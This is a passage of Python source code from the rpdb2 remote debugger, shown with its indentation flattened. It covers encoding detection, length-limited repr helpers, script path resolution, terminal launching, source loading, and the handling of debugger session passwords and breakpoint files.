if is_py3k():
return input(s)
i = raw_input(s)
i = as_unicode(i, detect_encoding(sys.stdin), fstrict = True)
return i
def _print(s, f = sys.stdout, feol = True):
s = as_unicode(s)
encoding = detect_encoding(f)
s = as_bytes(s, encoding, fstrict = False)
s = as_string(s, encoding)
if feol:
f.write(s + '\n')
else:
f.write(s)
def detect_encoding(file):
try:
encoding = file.encoding
if encoding == None:
return detect_locale()
except:
return detect_locale()
try:
codecs.lookup(encoding)
return encoding
except:
pass
if encoding.lower().startswith('utf_8'):
return 'utf-8'
return 'ascii'
def detect_locale():
encoding = locale.getdefaultlocale()[1]
if encoding == None:
return 'ascii'
try:
codecs.lookup(encoding)
return encoding
except:
pass
if encoding.lower().startswith('utf_8'):
return 'utf-8'
return 'ascii'
def class_name(c):
s = safe_str(c)
if "'" in s:
s = s.split("'")[1]
assert(s.startswith(__name__ + '.'))
return s
def clip_filename(path, n = DEFAULT_PATH_SUFFIX_LENGTH):
suffix = calc_suffix(path, n)
if not suffix.startswith('...'):
return suffix
index = suffix.find(os.sep)
if index == -1:
return suffix
clip = '...' + suffix[index:]
return clip
def safe_str(x):
try:
return str(x)
except:
return 'N/A'
def safe_repr(x):
try:
return repr(x)
except:
return 'N/A'
def parse_type(t):
rt = safe_repr(t)
if not "'" in rt:
return rt
st = rt.split("'")[1]
return st
def repr_list(pattern, l, length, encoding, is_valid):
length = max(0, length - len(pattern) + 2)
s = ''
index = 0
try:
for i in l:
#
# Remove any trace of session password from data structures that
# go over the network.
#
if type(i) == str and i in ['_rpdb2_args', '_rpdb2_pwd', 'm_rpdb2_pwd']:
continue
s += repr_ltd(i, length - len(s), encoding, is_valid)
index += 1
if index < len(l) and len(s) > length:
is_valid[0] = False
if not s.endswith('...'):
s += '...'
break
if index < len(l) or (index == 1 and pattern[0] == '('):
s += ', '
except AttributeError:
is_valid[0] = False
return as_unicode(pattern % s)
def repr_dict(pattern, d, length, encoding, is_valid):
length = max(0, length - len(pattern) + 2)
s = ''
index = 0
try:
for k in d:
#
# Remove any trace of session password from data structures that
# go over the network.
#
if type(k) == str and k in ['_rpdb2_args', '_rpdb2_pwd', 'm_rpdb2_pwd']:
continue
v = d[k]
s += repr_ltd(k, length - len(s), encoding, is_valid)
if len(s) > length:
is_valid[0] = False
if not s.endswith('...'):
s += '...'
break
s += ': ' + repr_ltd(v, length - len(s), encoding, is_valid)
index += 1
if index < len(d) and len(s) > length:
is_valid[0] = False
if not s.endswith('...'):
s += '...'
break
if index < len(d):
s += ', '
except AttributeError:
is_valid[0] = False
return as_unicode(pattern % s)
def repr_bytearray(s, length, encoding, is_valid):
try:
s = s.decode(encoding)
r = repr_unicode(s, length, is_valid)
return 'bytearray(b' + r[1:] + ')'
except:
#
# If a string is not encoded as utf-8 its repr() will be done with
# the regular repr() function.
#
return repr_str_raw(s, length, is_valid)
def repr_bytes(s, length, encoding, is_valid):
try:
s = s.decode(encoding)
r = repr_unicode(s, length, is_valid)
return 'b' + r[1:]
except:
#
# If a string is not encoded as utf-8 its repr() will be done with
# the regular repr() function.
#
return repr_str_raw(s, length, is_valid)
def repr_str8(s, length, encoding, is_valid):
try:
s = s.decode(encoding)
r = repr_unicode(s, length, is_valid)
return 's' + r[1:]
except:
#
# If a string is not encoded as utf-8 its repr() will be done with
# the regular repr() function.
#
return repr_str_raw(s, length, is_valid)
def repr_str(s, length, encoding, is_valid):
try:
s = as_unicode(s, encoding, fstrict = True)
r = repr_unicode(s, length, is_valid)
return r[1:]
except:
#
# If a string is not encoded as utf-8 its repr() will be done with
# the regular repr() function.
#
return repr_str_raw(s, length, is_valid)
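#
# repr_unicode() escapes ASCII characters with repr() and passes other
# characters through as-is, truncating the output (and clearing is_valid)
# once 'length' is exceeded. The [2, 1][is_py3k()] index strips the quote
# prefix from the repr() of a single character ("u'x'" on Python 2,
# "'x'" on Python 3) so only the escaped character body is kept.
#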
def repr_unicode(s, length, is_valid):
index = [2, 1][is_py3k()]
rs = ''
for c in s:
if len(rs) > length:
is_valid[0] = False
rs += '...'
break
if ord(c) < 128:
rs += repr(c)[index: -1]
else:
rs += c
if not "'" in rs:
return as_unicode("u'%s'" % rs)
if not '"' in rs:
return as_unicode('u"%s"' % rs)
return as_unicode("u'%s'" % rs.replace("'", "\\'"))
def repr_str_raw(s, length, is_valid):
if is_unicode(s):
eli = ELLIPSIS_UNICODE
else:
eli = ELLIPSIS_BYTES
if len(s) > length:
is_valid[0] = False
s = s[: length] + eli
return as_unicode(repr(s))
def repr_base(v, length, is_valid):
r = repr(v)
if len(r) > length:
is_valid[0] = False
r = r[: length] + '...'
return as_unicode(r)
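#
# repr_ltd() is a length-limited repr(): it dispatches on the type of x and
# keeps the output under 'length' characters. is_valid acts as an output
# flag and is set to False whenever the result is truncated or otherwise
# not a faithful repr of the object.
#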
def repr_ltd(x, length, encoding, is_valid = [True]):
try:
length = max(0, length)
try:
if isinstance(x, frozenset):
return repr_list('frozenset([%s])', x, length, encoding, is_valid)
if isinstance(x, set):
return repr_list('set([%s])', x, length, encoding, is_valid)
except NameError:
pass
if isinstance(x, sets.Set):
return repr_list('sets.Set([%s])', x, length, encoding, is_valid)
if isinstance(x, sets.ImmutableSet):
return repr_list('sets.ImmutableSet([%s])', x, length, encoding, is_valid)
if isinstance(x, list):
return repr_list('[%s]', x, length, encoding, is_valid)
if isinstance(x, tuple):
return repr_list('(%s)', x, length, encoding, is_valid)
if isinstance(x, dict):
return repr_dict('{%s}', x, length, encoding, is_valid)
if encoding == ENCODING_RAW_I and [True for t in [str, unicode, bytearray, bytes, str8] if t is type(x)]:
return repr_str_raw(x, length, is_valid)
if type(x) is unicode:
return repr_unicode(x, length, is_valid)
if type(x) is bytearray:
return repr_bytearray(x, length, encoding, is_valid)
if type(x) is bytes:
return repr_bytes(x, length, encoding, is_valid)
if type(x) is str8:
return repr_str8(x, length, encoding, is_valid)
if type(x) is str:
return repr_str(x, length, encoding, is_valid)
if [True for t in [bool, int, float, long, type(None)] if t is type(x)]:
return repr_base(x, length, is_valid)
is_valid[0] = False
y = safe_repr(x)[: length]
if len(y) == length:
y += '...'
if encoding == ENCODING_RAW_I:
encoding = 'utf-8'
try:
y = as_unicode(y, encoding, fstrict = True)
return y
except:
pass
encoding = sys.getfilesystemencoding()
y = as_unicode(y, encoding)
return y
except:
print_debug_exception()
return as_unicode('N/A')
def print_debug(_str):
if not g_fDebug:
return
t = time.time()
l = time.localtime(t)
s = time.strftime('%H:%M:%S', l) + '.%03d' % ((t - int(t)) * 1000)
f = sys._getframe(1)
filename = os.path.basename(f.f_code.co_filename)
lineno = f.f_lineno
name = f.f_code.co_name
str = '%s %s:%d in %s: %s' % (s, filename, lineno, name, _str)
_print(str, sys.__stderr__)
def print_debug_exception(fForce = False):
"""
Print the current exception to stderr when in debug mode.
"""
if not g_fDebug and not fForce:
return
(t, v, tb) = sys.exc_info()
print_exception(t, v, tb, fForce)
class CFileWrapper:
def __init__(self, f):
self.m_f = f
def write(self, s):
_print(s, self.m_f, feol = False)
def __getattr__(self, name):
return self.m_f.__getattr__(name)
def print_exception(t, v, tb, fForce = False):
"""
Print exceptions to stderr when in debug mode.
"""
if not g_fDebug and not fForce:
return
try:
g_traceback_lock.acquire()
traceback.print_exception(t, v, tb, file = CFileWrapper(sys.stderr))
finally:
g_traceback_lock.release()
def print_stack():
"""
Print the current stack trace to stderr when in debug mode.
"""
if g_fDebug == True:
try:
g_traceback_lock.acquire()
traceback.print_stack(file = CFileWrapper(sys.stderr))
finally:
g_traceback_lock.release()
#
# myisfile() is similar to os.path.isfile() but also works with
# Python eggs.
#
def myisfile(path):
try:
mygetfile(path, False)
return True
except:
return False
#
# Read a file even if inside a Python egg.
#
def mygetfile(path, fread_file = True):
if os.path.isfile(path):
if not fread_file:
return
if sys.platform == 'OpenVMS':
#
# OpenVMS filesystem does not support byte stream.
#
mode = 'r'
else:
mode = 'rb'
f = open(path, mode)
data = f.read()
f.close()
return data
d = os.path.dirname(path)
while True:
if os.path.exists(d):
break
_d = os.path.dirname(d)
if _d in [d, '']:
raise IOError
d = _d
if not zipfile.is_zipfile(d):
raise IOError
z = zipimport.zipimporter(d)
try:
data = z.get_data(path[len(d) + 1:])
return data
except:
raise IOError
def split_command_line_path_filename_args(command_line):
"""
Split a command line into a 3-element tuple (path, filename, args).
"""
command_line = command_line.strip()
if len(command_line) == 0:
return ('', '', '')
if myisfile(command_line):
(_path, _filename) = split_path(command_line)
return (_path, _filename, '')
if command_line[0] in ['"', "'"]:
_command_line = command_line[1:]
i = _command_line.find(command_line[0])
if i == -1:
(_path, filename) = split_path(_command_line)
return (_path, filename, '')
else:
(_path, filename) = split_path(_command_line[: i])
args = _command_line[i + 1:].strip()
return (_path, filename, args)
else:
i = command_line.find(' ')
if i == -1:
(_path, filename) = split_path(command_line)
return (_path, filename, '')
else:
args = command_line[i + 1:].strip()
(_path, filename) = split_path(command_line[: i])
return (_path, filename, args)
def split_path(path):
(_path, filename) = os.path.split(path)
#
# Make sure the path separator (e.g. '/') ends the split path if it was in
# the original path.
#
if (_path[-1:] not in [os.path.sep, os.path.altsep]) and \
(path[len(_path): len(_path) + 1] in [os.path.sep, os.path.altsep]):
_path = _path + path[len(_path): len(_path) + 1]
return (_path, filename)
def my_os_path_join(dirname, basename):
if is_py3k() or (type(dirname) == str and type(basename) == str):
return os.path.join(dirname, basename)
encoding = sys.getfilesystemencoding()
if type(dirname) == str:
dirname = dirname.decode(encoding)
if type(basename) == str:
basename = basename.decode(encoding)
return os.path.join(dirname, basename)
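#
# calc_frame_path() resolves a frame's source file to an absolute,
# case-normalized path, using __file__ from the frame globals when
# co_filename is a pseudo name such as '<string>'. Results are cached
# in g_frames_path.
#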
def calc_frame_path(frame):
globals_filename = frame.f_globals.get('__file__', None)
filename = frame.f_code.co_filename
if filename.startswith('<'):
if globals_filename == None:
return filename
else:
filename = CalcScriptName(os.path.basename(globals_filename))
if filename in g_frames_path:
return g_frames_path[filename]
if globals_filename != None:
dirname = os.path.dirname(globals_filename)
basename = os.path.basename(filename)
path = my_os_path_join(dirname, basename)
if os.path.isabs(path):
abspath = my_abspath(path)
lowered = winlower(abspath)
g_frames_path[filename] = lowered
return lowered
try:
abspath = FindFile(path, fModules = True)
lowered = winlower(abspath)
g_frames_path[filename] = lowered
return lowered
except IOError:
pass
if os.path.isabs(filename):
abspath = my_abspath(filename)
lowered = winlower(abspath)
g_frames_path[filename] = lowered
return lowered
try:
abspath = FindFile(filename, fModules = True)
lowered = winlower(abspath)
g_frames_path[filename] = lowered
return lowered
except IOError:
lowered = winlower(filename)
return lowered
def my_abspath(path):
"""
We need our own little version of os.path.abspath since the original
code imports modules in the 'nt' code path which can cause our debugger
to deadlock in unexpected locations.
"""
if path[:1] == '<':
#
# 'path' may also be '<stdin>' in which case it is left untouched.
#
return path
if os.name == 'nt':
return my_abspath1(path)
return os.path.abspath(path)
#
# MOD
#
def my_abspath1(path):
"""
Modification of ntpath.abspath() that avoids doing an import.
"""
if path:
try:
path = _getfullpathname(path)
except WindowsError:
pass
else:
try:
path = getcwd()
except UnicodeDecodeError:
#
# This exception can be raised in py3k (alpha) on nt.
#
path = getcwdu()
np = os.path.normpath(path)
if (len(np) >= 2) and (np[1:2] == ':'):
np = np[:1].upper() + np[1:]
return np
def IsPythonSourceFile(path):
if path.endswith(PYTHON_FILE_EXTENSION):
return True
if path.endswith(PYTHONW_FILE_EXTENSION):
return True
path = g_found_unicode_files.get(path, path)
for lineno in range(1, 10):
line = get_source_line(path, lineno)
if line.startswith('#!') and 'python' in line:
return True
if is_py3k():
#
# py3k does not have compiler.parseFile, so return
# True anyway...
#
return True
try:
compiler.parseFile(path)
return True
except:
return False
def CalcModuleName(filename):
_basename = os.path.basename(filename)
(modulename, ext) = os.path.splitext(_basename)
if ext in PYTHON_EXT_LIST:
return modulename
return _basename
def CalcScriptName(filename, fAllowAnyExt = True):
if filename.endswith(PYTHON_FILE_EXTENSION):
return filename
if filename.endswith(PYTHONW_FILE_EXTENSION):
return filename
if filename.endswith(PYTHONW_SO_EXTENSION):
scriptname = filename[:-3] + PYTHON_FILE_EXTENSION
return scriptname
if filename[:-1].endswith(PYTHON_FILE_EXTENSION):
scriptname = filename[:-1]
return scriptname
if fAllowAnyExt:
return filename
scriptname = filename + PYTHON_FILE_EXTENSION
return scriptname
def FindModuleDir(module_name):
if module_name == '':
raise IOError
dot_index = module_name.rfind('.')
if dot_index != -1:
parent = module_name[: dot_index]
child = module_name[dot_index + 1:]
else:
parent = ''
child = module_name
m = sys.modules[module_name]
if not hasattr(m, '__file__') or m.__file__ == None:
parent_dir = FindModuleDir(parent)
module_dir = my_os_path_join(parent_dir, winlower(child))
return module_dir
if not os.path.isabs(m.__file__):
parent_dir = FindModuleDir(parent)
module_dir = my_os_path_join(parent_dir, winlower(child))
return module_dir
(root, ext) = os.path.splitext(m.__file__)
if root.endswith('__init__'):
root = os.path.dirname(root)
abspath = my_abspath(root)
lowered = winlower(abspath)
return lowered
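#
# FindFileAsModule() maps a source file name to a module already loaded in
# sys.modules and uses that module's location to recover the full path of
# the matching .py or .pyw file.
#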
def FindFileAsModule(filename):
lowered = winlower(filename)
(root, ext) = os.path.splitext(lowered)
root_dotted = root.replace('\\', '.').replace('/', '.').replace(':', '.')
match_list = []
for (module_name, m) in list(sys.modules.items()):
lowered_module_name = winlower(module_name)
if (root_dotted + '.').startswith(lowered_module_name + '.'):
match_list.append((len(module_name), module_name))
if lowered_module_name == root_dotted:
break
match_list.sort()
match_list.reverse()
for (matched_len, matched_module) in match_list:
try:
module_dir = FindModuleDir(matched_module)
except IOError:
continue
suffix = root[matched_len:]
if suffix == '':
path = module_dir + ext
else:
path = my_os_path_join(module_dir, suffix.strip('\\')) + ext
scriptname = CalcScriptName(path, fAllowAnyExt = False)
if myisfile(scriptname):
return scriptname
#
# Check .pyw files
#
scriptname += 'w'
if scriptname.endswith(PYTHONW_FILE_EXTENSION) and myisfile(scriptname):
return scriptname
raise IOError
def getcwd():
try:
return os.getcwd()
except UnicodeDecodeError:
print_debug_exception(True)
raise
def getcwdu():
if hasattr(os, 'getcwdu'):
return os.getcwdu()
return getcwd()
def FindFile(
filename,
sources_paths = [],
fModules = False,
fAllowAnyExt = True
):
"""
FindFile looks for the full path of a script in a rather non-strict,
human-like way.
ENCODING:
filename should be either Unicode or encoded with sys.getfilesystemencoding()!
The returned value is encoded with sys.getfilesystemencoding().
It will always look for .py or .pyw files even if a .pyc or no
extension is given.
The search order is:
1. Loaded modules (only if fModules is set).
2. The full path (if it exists).
3. sources_paths.
4. The current path.
5. PYTHONPATH.
6. PATH.
"""
if filename in g_found_unicode_files:
return filename
if filename.startswith('<'):
raise IOError
filename = filename.strip('\'"')
filename = os.path.expanduser(filename)
if fModules and not (os.path.isabs(filename) or filename.startswith('.')):
try:
return winlower(FindFileAsModule(filename))
except IOError:
pass
if fAllowAnyExt:
try:
abspath = FindFile(
filename,
sources_paths,
fModules = False,
fAllowAnyExt = False
)
return abspath
except IOError:
pass
if os.path.isabs(filename) or filename.startswith('.'):
try:
scriptname = None
abspath = my_abspath(filename)
lowered = winlower(abspath)
scriptname = CalcScriptName(lowered, fAllowAnyExt)
if myisfile(scriptname):
return scriptname
#
# Check .pyw files
#
scriptname += 'w'
if scriptname.endswith(PYTHONW_FILE_EXTENSION) and myisfile(scriptname):
return scriptname
scriptname = None
raise IOError
finally:
if not is_py3k() and is_unicode(scriptname):
fse = sys.getfilesystemencoding()
_l = as_string(scriptname, fse)
if '?' in _l:
g_found_unicode_files[_l] = scriptname
return _l
scriptname = CalcScriptName(filename, fAllowAnyExt)
try:
cwd = [getcwd(), getcwdu()]
except UnicodeDecodeError:
#
# This exception can be raised in py3k (alpha) on nt.
#
cwd = [getcwdu()]
env_path = os.environ['PATH']
paths = sources_paths + cwd + g_initial_cwd + sys.path + env_path.split(os.pathsep)
try:
lowered = None
for p in paths:
f = my_os_path_join(p, scriptname)
abspath = my_abspath(f)
lowered = winlower(abspath)
if myisfile(lowered):
return lowered
#
# Check .pyw files
#
lowered += 'w'
if lowered.endswith(PYTHONW_FILE_EXTENSION) and myisfile(lowered):
return lowered
lowered = None
raise IOError
finally:
if not is_py3k() and is_unicode(lowered):
fse = sys.getfilesystemencoding()
_l = as_string(lowered, fse)
if '?' in _l:
g_found_unicode_files[_l] = lowered
return _l
def IsFileInPath(filename):
if filename == '':
return False
try:
FindFile(filename)
return True
except IOError:
return False
def IsPrefixInEnviron(_str):
for e in os.environ.keys():
if e.startswith(_str):
return True
return False
def CalcTerminalCommand():
"""
Calc the unix command to start a new terminal, for example: xterm
"""
if RPDBTERM in os.environ:
term = os.environ[RPDBTERM]
if IsFileInPath(term):
return term
if COLORTERM in os.environ:
term = os.environ[COLORTERM]
if IsFileInPath(term):
return term
if IsPrefixInEnviron(KDE_PREFIX):
(s, term) = commands.getstatusoutput(KDE_DEFAULT_TERM_QUERY)
if (s == 0) and IsFileInPath(term):
return term
elif IsPrefixInEnviron(GNOME_PREFIX):
if IsFileInPath(GNOME_DEFAULT_TERM):
return GNOME_DEFAULT_TERM
if IsFileInPath(XTERM):
return XTERM
if IsFileInPath(RXVT):
return RXVT
raise SpawnUnsupported
def CalcMacTerminalCommand(command):
"""
Calculate what to put in popen to start a given script.
Starts a tiny Applescript that performs the script action.
"""
#
# Quoting is a bit tricky; we do it step by step.
# Make Applescript string: put backslashes before double quotes and
# backslashes.
#
command = command.replace('\\', '\\\\').replace('"', '\\"')
#
# Make complete Applescript command.
#
command = 'tell application "Terminal" to do script "%s"' % command
#
# Make a shell single quoted string (put backslashed single quotes
# outside string).
#
command = command.replace("'", "'\\''")
#
# Make complete shell command.
#
return "osascript -e '%s'" % command
def winlower(path):
"""
Return the lowercase version of 'path' on NT systems.
On NT, filenames are case insensitive, so paths are lowercased
for comparison purposes.
"""
if os.name == 'nt':
return path.lower()
return path
def source_provider_blender(filename):
"""
Return source code of the file referred by filename.
Support for debugging of Blender Python scripts.
Blender scripts are not always saved on disk, and their
source has to be queried directly from the Blender API.
http://www.blender.org
"""
if not 'Blender.Text' in sys.modules:
raise IOError
if filename.startswith('<'):
#
# This specifies a Blender script whose source is not
# available.
#
raise IOError(BLENDER_SOURCE_NOT_AVAILABLE)
_filename = os.path.basename(filename)
try:
t = sys.modules['Blender.Text'].get(_filename)
lines = t.asLines()
return '\n'.join(lines) + '\n'
except NameError:
f = winlower(_filename)
tlist = sys.modules['Blender.Text'].get()
t = None
for _t in tlist:
n = winlower(_t.getName())
if n == f:
t = _t
break
if t == None:
#
# filename does not specify a blender file. Raise IOError
# so that search can continue on file system.
#
raise IOError
lines = t.asLines()
return '\n'.join(lines) + '\n'
def source_provider_filesystem(filename):
l = mygetfile(filename)
if l[:3] == as_bytes(ENCODING_UTF8_PREFIX_1):
l = l[3:]
return l
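#
# source_provider() fetches source text through a chain of providers: the
# auxiliary provider (g_source_provider_aux) if one is set, then the
# Blender text provider, and finally the filesystem.
#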
def source_provider(filename):
source = None
ffilesystem = False
try:
if g_source_provider_aux != None:
source = g_source_provider_aux(filename)
except IOError:
v = sys.exc_info()[1]
if SOURCE_NOT_AVAILABLE in v.args:
raise
try:
if source == None:
source = source_provider_blender(filename)
except IOError:
v = sys.exc_info()[1]
if BLENDER_SOURCE_NOT_AVAILABLE in v.args:
raise
if source == None:
source = source_provider_filesystem(filename)
ffilesystem = True
encoding = ParseEncoding(source)
if not is_unicode(source):
source = as_unicode(source, encoding)
return source, encoding, ffilesystem
def lines_cache(filename):
filename = g_found_unicode_files.get(filename, filename)
if filename in g_lines_cache:
return g_lines_cache[filename]
(source, encoding, ffilesystem) = source_provider(filename)
source = source.replace(as_unicode('\r\n'), as_unicode('\n'))
lines = source.split(as_unicode('\n'))
g_lines_cache[filename] = (lines, encoding, ffilesystem)
return (lines, encoding, ffilesystem)
def get_source(filename):
(lines, encoding, ffilesystem) = lines_cache(filename)
source = as_unicode('\n').join(lines)
return (source, encoding)
def get_source_line(filename, lineno):
(lines, encoding, ffilesystem) = lines_cache(filename)
if lineno > len(lines):
return as_unicode('')
return lines[lineno - 1] + as_unicode('\n')
def is_provider_filesystem(filename):
try:
(lines, encoding, ffilesystem) = lines_cache(filename)
return ffilesystem
except IOError:
v = sys.exc_info()[1]
return not (BLENDER_SOURCE_NOT_AVAILABLE in v.args or SOURCE_NOT_AVAILABLE in v.args)
def get_file_encoding(filename):
(lines, encoding, ffilesystem) = lines_cache(filename)
return encoding
def ParseLineEncoding(l):
if l.startswith('# -*- coding: '):
e = l[len('# -*- coding: '):].split()[0]
return e
if l.startswith('# vim:fileencoding='):
e = l[len('# vim:fileencoding='):].strip()
return e
return None
def ParseEncoding(txt):
"""
Parse document encoding according to:
http://docs.python.org/ref/encodings.html
"""
eol = '\n'
if not is_unicode(txt):
eol = as_bytes('\n')
l = txt.split(eol, 20)[:-1]
for line in l:
line = as_unicode(line)
encoding = ParseLineEncoding(line)
if encoding is not None:
try:
codecs.lookup(encoding)
return encoding
except:
return 'utf-8'
return 'utf-8'
def _getpid():
try:
return os.getpid()
except:
return -1
def calcURL(host, port):
"""
Form HTTP URL from 'host' and 'port' arguments.
"""
url = "http://" + str(host) + ":" + str(port)
return url
def GetSocketError(e):
if (not isinstance(e.args, tuple)) or (len(e.args) == 0):
return -1
return e.args[0]
def ControlRate(t_last_call, max_rate):
"""
Limits rate at which this function is called by sleeping.
Returns the time of invocation.
"""
p = 1.0 / max_rate
t_current = time.time()
dt = t_current - t_last_call
if dt < p:
time.sleep(p - dt)
return t_current
def generate_rid():
"""
Return a 7-digit random id.
"""
rid = repr(random.randint(1000000, 9999999))
rid = as_unicode(rid)
return rid
def generate_random_char(_str):
"""
Return a random character from string argument.
"""
if _str == '':
return ''
i = random.randint(0, len(_str) - 1)
return _str[i]
def generate_random_password():
"""
Generate an 8-character-long password.
"""
s = 'abdefghijmnqrt' + 'ABDEFGHJLMNQRTY'
ds = '23456789_' + s
_rpdb2_pwd = generate_random_char(s)
for i in range(0, 7):
_rpdb2_pwd += generate_random_char(ds)
_rpdb2_pwd = as_unicode(_rpdb2_pwd)
return _rpdb2_pwd
def is_valid_pwd(_rpdb2_pwd):
if _rpdb2_pwd in [None, '']:
return False
try:
if not is_unicode(_rpdb2_pwd):
_rpdb2_pwd = _rpdb2_pwd.decode('ascii')
_rpdb2_pwd.encode('ascii')
except:
return False
for c in _rpdb2_pwd:
if c.isalnum():
continue
if c == '_':
continue
return False
return True
def is_encryption_supported():
"""
Is the Crypto module imported/available.
"""
return 'DES' in globals()
def calc_suffix(_str, n):
"""
Return an n-character suffix of the argument string of the form
'...suffix'.
"""
if len(_str) <= n:
return _str
return '...' + _str[-(n - 3):]
def calc_prefix(_str, n):
"""
Return an n-character prefix of the argument string of the form
'prefix...'.
"""
if len(_str) <= n:
return _str
return _str[: (n - 3)] + '...'
def create_rpdb_settings_folder():
"""
Create the settings folder on Posix systems:
'~/.rpdb2_settings' with mode 700.
"""
if os.name != POSIX:
return
home = os.path.expanduser('~')
rsf = os.path.join(home, RPDB_SETTINGS_FOLDER)
if not os.path.exists(rsf):
os.mkdir(rsf, int('0700', 8))
pwds = os.path.join(home, RPDB_PWD_FOLDER)
if not os.path.exists(pwds):
os.mkdir(pwds, int('0700', 8))
bpl = os.path.join(home, RPDB_BPL_FOLDER)
if not os.path.exists(bpl):
os.mkdir(bpl, int('0700', 8))
def cleanup_bpl_folder(path):
if random.randint(0, 10) > 0:
return
l = os.listdir(path)
if len(l) < MAX_BPL_FILES:
return
try:
ll = [(os.stat(os.path.join(path, f))[stat.ST_ATIME], f) for f in l]
except:
return
ll.sort()
for (t, f) in ll[: -MAX_BPL_FILES]:
try:
os.remove(os.path.join(path, f))
except:
pass
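#
# The breakpoint list for a script is stored in a file whose name is a
# short hash of the script path, under ~/.rpdb2_settings/breakpoints on
# Posix systems or under a temp folder on Windows.
#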
def calc_bpl_filename(filename):
key = as_bytes(filename)
tmp_filename = hmac.new(key).hexdigest()[:10]
if os.name == POSIX:
home = os.path.expanduser('~')
bpldir = os.path.join(home, RPDB_BPL_FOLDER)
cleanup_bpl_folder(bpldir)
path = os.path.join(bpldir, tmp_filename) + BREAKPOINTS_FILE_EXT
return path
#
# gettempdir() is used since it works with unicode user names on
# Windows.
#
tmpdir = tempfile.gettempdir()
bpldir = os.path.join(tmpdir, RPDB_BPL_FOLDER_NT)
if not os.path.exists(bpldir):
#
# Folder creation is done here since this is a temp folder.
#
try:
os.mkdir(bpldir, int('0700', 8))
except:
print_debug_exception()
raise CException
else:
cleanup_bpl_folder(bpldir)
path = os.path.join(bpldir, tmp_filename) + BREAKPOINTS_FILE_EXT
return path
def calc_pwd_file_path(rid):
"""
Calc the password file path for Posix systems:
'~/.rpdb2_settings/passwords/<rid>'
"""
home = os.path.expanduser('~')
rsf = os.path.join(home, RPDB_PWD_FOLDER)
pwd_file_path = os.path.join(rsf, rid)
return pwd_file_path
def create_pwd_file(rid, _rpdb2_pwd):
"""
Create password file for Posix systems.
"""
if os.name != POSIX:
return
path = calc_pwd_file_path(rid)
fd = os.open(path, os.O_WRONLY | os.O_CREAT, int('0600', 8))
os.write(fd, as_bytes(_rpdb2_pwd))
os.close(fd)
def read_pwd_file(rid):
"""
Read password from password file for Posix systems.
"""
assert(os.name == POSIX)
path = calc_pwd_file_path(rid)
p = open(path, 'r')
_rpdb2_pwd = p.read()
p.close()
_rpdb2_pwd = as_unicode(_rpdb2_pwd, fstrict = True)
return _rpdb2_pwd
def delete_pwd_file(rid):
"""
Delete password file for Posix systems.
"""
if os.name != POSIX:
return
path = calc_pwd_file_path(rid)
try:
os.remove(path)
except:
pass
def CalcUserShell():
try:
s = os.getenv('SHELL')
if s != None:
return s
import getpass
username = getpass.getuser()
f = open('/etc/passwd', 'r')
l = f.read()
f.close()
ll = l.split('\n')
d = dict([(e.split(':', 1)[0], e.split(':')[-1]) for e in ll])
return d[username]
except:
return 'sh'
def IsFilteredAttribute(a):
if not (a.startswith('__') and a.endswith('__')):
return False
if a in ['__class__', '__bases__', '__file__', '__doc__', '__name__', '__all__', '__builtins__']:
return False
return True
def IsFilteredAttribute2(r, a):
try:
o = getattr(r, a)
r = parse_type(type(o))
if 'function' in r or 'method' in r or r == 'type':
return True
return False
except:
return False
def CalcFilteredDir(r, filter_level):
d = dir(r)
if 'finfo' in d and parse_type(type(r)) == 'mp_request':
#
# Workaround mod_python segfault in type(req.finfo) by
# removing this attribute from the namespace viewer.
#
d.remove('finfo')
if filter_level == 0:
return d
fd = [a for a in d if not IsFilteredAttribute(a)]
return fd
def CalcIdentity(r, filter_level):
if filter_level == 0:
return r
if not hasattr(r, 'im_func'):
return r
return r.im_func
def getattr_nothrow(o, a):
try:
return getattr(o, a)
except AttributeError:
return ERROR_NO_ATTRIBUTE
except:
print_debug_exception()
return ERROR_NO_ATTRIBUTE
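#
# calc_attribute_list() computes the attribute names to show in the
# namespace viewer. Depending on filter_level it hides attributes that are
# inherited unchanged from the object's class or bases, as well as
# functions, methods and types.
#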
def calc_attribute_list(r, filter_level):
d = CalcFilteredDir(r, filter_level)
rs = set(d)
c = getattr_nothrow(r, '__class__')
if not c is ERROR_NO_ATTRIBUTE:
d = CalcFilteredDir(c, False)
cs = set(d)
s = rs & cs
for e in s:
o1 = getattr_nothrow(r, e)
o2 = getattr_nothrow(c, e)
if o1 is ERROR_NO_ATTRIBUTE or CalcIdentity(o1, filter_level) is CalcIdentity(o2, filter_level):
rs.discard(e)
try:
if filter_level == 1 and getattr(o1, '__self__') is getattr(o2, '__self__'):
rs.discard(e)
except:
pass
bl = getattr_nothrow(r, '__bases__')
if type(bl) == tuple:
for b in bl:
d = CalcFilteredDir(b, False)
bs = set(d)
s = rs & bs
for e in s:
o1 = getattr_nothrow(r, e)
o2 = getattr_nothrow(b, e)
if o1 is ERROR_NO_ATTRIBUTE or CalcIdentity(o1, filter_level) is CalcIdentity(o2, filter_level):
rs.discard(e)
try:
if filter_level == 1 and getattr(o1, '__self__') is getattr(o2, '__self__'):
rs.discard(e)
except:
pass
l = [a for a in rs if (filter_level < 2 or not IsFilteredAttribute2(r, a))]
if hasattr(r, '__class__') and not '__class__' in l:
l = ['__class__'] + l
if hasattr(r, '__bases__') and not '__bases__' in l:
l = ['__bases__'] + l
al = [a for a in l if hasattr(r, a)]
return al
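#
# _RPDB2_FindRepr wraps a container and allows an item to be looked up or
# assigned by the length-limited repr() string of its key (for dicts) or of
# the item itself (for other iterables). Iteration stops after
# MAX_SORTABLE_LENGTH items.
#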
class _RPDB2_FindRepr:
def __init__(self, o, repr_limit):
self.m_object = o
self.m_repr_limit = repr_limit
def __getitem__(self, key):
index = 0
for i in self.m_object:
if repr_ltd(i, self.m_repr_limit, encoding = ENCODING_RAW_I).replace('"', '"') == key:
if isinstance(self.m_object, dict):
return self.m_object[i]
return i
index += 1
if index > MAX_SORTABLE_LENGTH:
return None
def __setitem__(self, key, value):
if not isinstance(self.m_object, dict):
return
index = 0
for i in self.m_object:
if repr_ltd(i, self.m_repr_limit, encoding = ENCODING_RAW_I).replace('"', '"') == key:
self.m_object[i] = value
return
index += 1
if index > MAX_SORTABLE_LENGTH:
return
#
# Since on Python 3000 the comparison of different types raises exceptions and
# the __cmp__ method was removed, sorting of namespace items is based on
# lexicographic order except for numbers which are sorted normally and appear
# before all other types.
#
def sort(s):
if sys.version_info[:2] == (2, 3):
#
# On Python 2.3 the key parameter is not supported.
#
s.sort(sort_cmp)
return
s.sort(key = sort_key)
def sort_key(e):
if is_py3k() and isinstance(e, numbers.Number):
return (0, e)
if not is_py3k() and operator.isNumberType(e):
return (0, e)
return (1, repr_ltd(e, 256, encoding = ENCODING_RAW_I))
def sort_cmp(x, y):
